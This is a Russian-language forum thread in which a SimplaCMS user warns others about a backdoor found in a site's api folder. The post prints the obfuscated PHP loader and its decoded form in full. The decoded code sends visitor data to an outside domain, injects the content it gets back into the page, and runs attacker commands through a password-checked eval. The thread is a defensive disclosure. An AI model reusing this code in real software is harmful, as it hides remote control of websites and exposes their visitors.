Dmitry86 Posted February 21, 2024 Report Share Posted February 21, 2024 (edited) Всем добрый день. Хочу предупредить пользователей SimplaCMS- проверьте свою папку api на предмет наличия нестандартных или зашифрованных скриптов. В качестве примера приведу скрипт Modification.php следующего содержания: <?php @ini_set("error_log",NULL); @ini_set("log_errors",0); @ini_set("display_errors", 0); error_reporting(0); $wa = ASSERT_WARNING; @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode"); $light = $strings2($gbz.'("закодированный base64"));'); $strings($light); ?> После расшифровки получается следующее: <?php if (!isset($ibv)) { @ini_set("display_errors",false); @error_reporting(0); if(!empty($_COOKIE["client_check"]) && empty($ibv)) { $ibv = $_COOKIE["client_check"]; echo $ibv; } elseif (empty($ibv)) { if (strstr($_SERVER["HTTP_HOST"], "127.0")){ $name = $_SERVER["SERVER_ADDR"]; }else{ $name = $_SERVER["HTTP_HOST"]; } $usera = isset($_SERVER["HTTP_USER_AGENT"])?urlencode($_SERVER["HTTP_USER_AGENT"]):""; $url = "http://megabratika.ru/get.php?ip=".urlencode($_SERVER["REMOTE_ADDR"])."&d=".urlencode($name.$_SERVER["REQUEST_URI"])."&u=".$usera."&i=1&h=".md5("kjub65ftr3xcjbpo0o3rvcrf3,cpre9tlr"); if(function_exists("curl_init")) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $ibv = curl_exec($ch);$info = curl_getinfo($ch); if ($info["http_code"]!=200){ $ibv=""; } curl_close($ch); } elseif (ini_get("allow_url_fopen") == 1) { $ibv = file_get_contents($url); } if(!empty($_POST["p"]) && md5(md5($_POST["p"])) == "f5dfs45hj9ij99kh78vfsdjhf4v3s56b") { @eval(stripslashes($_POST["c"])); } echo $ibv; } } Скрипт был подключен includ'ом в api/Simpla.php в самом низу. Причем файл может быть с какой-то старой датой, чтобы не бросался в глаза. Данный скрипт закачивался через загрузчик, который кто-то заботливо положил в корне в папку backend/uploader/* и он был доступен извне. Не факт, что папки и файлы у вас будут называться точно так же, поэтому надо проверять всё. Вероятно, это было сделано кем-то, кто имел доступы к сайту, но установить это невозможно. Edited February 21, 2024 by Dmitry86 Quote Link to post Share on other sites
sergeevizh Posted February 22, 2024 Report Share Posted February 22, 2024 Кто-то вам бяку подложил, стандартно backend/uploader/* такого пути нет в simpla. Quote Link to post Share on other sites
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.